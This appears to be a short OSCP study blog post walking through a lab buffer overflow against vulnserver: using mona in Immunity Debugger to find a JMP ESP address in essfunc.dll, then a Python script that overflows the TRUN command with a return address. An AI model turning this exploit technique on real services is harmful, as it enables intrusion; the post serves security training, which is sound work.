OSCP Security Technology - Finding the Right Module

OSCP Security Technology - Finding the Right Module

Download Mona module and set immunity debugger configuration.

https://github.com/corelan/mona

OSCP Security Technology - Finding the Right Module

Open vulnserver and immunity debugger.

OSCP Security Technology - Finding the Right Module

Open mona modules, but not find what we need.

OSCP Security Technology - Finding the Right Module

Find the address(FFE4) and search it in the mona module.

locate nasm_shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
JMP ESP

OSCP Security Technology - Finding the Right Module

!mona find -s "\xff\xe4" -m essfunc.dll

OSCP Security Technology - Finding the Right Module

Write the exploit script.

nano module.py
chmod 777 module.py
#!/usr/bin/python
import socket
import sys
 
shellcode = "A" * 2003 + "\xaf\x11\x50\x62"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    connect=s.connect(('192.168.2.21',9999))
    s.send(('TRUN /.:/' + shellcode))
except:
    print "check debugger" 
s.close()

Set immunity debugger before the exploit. Find the address and press F2 to highlight it.

OSCP Security Technology - Finding the Right Module

OSCP Security Technology - Finding the Right Module

Run the exploit script.

OSCP Security Technology - Finding the Right Module

Break it at essfunc.625011AF.

OSCP Security Technology - Finding the Right Module

上一篇:G9U5-4 Finding an apartment


下一篇:[HDU-6756]Finding a MEX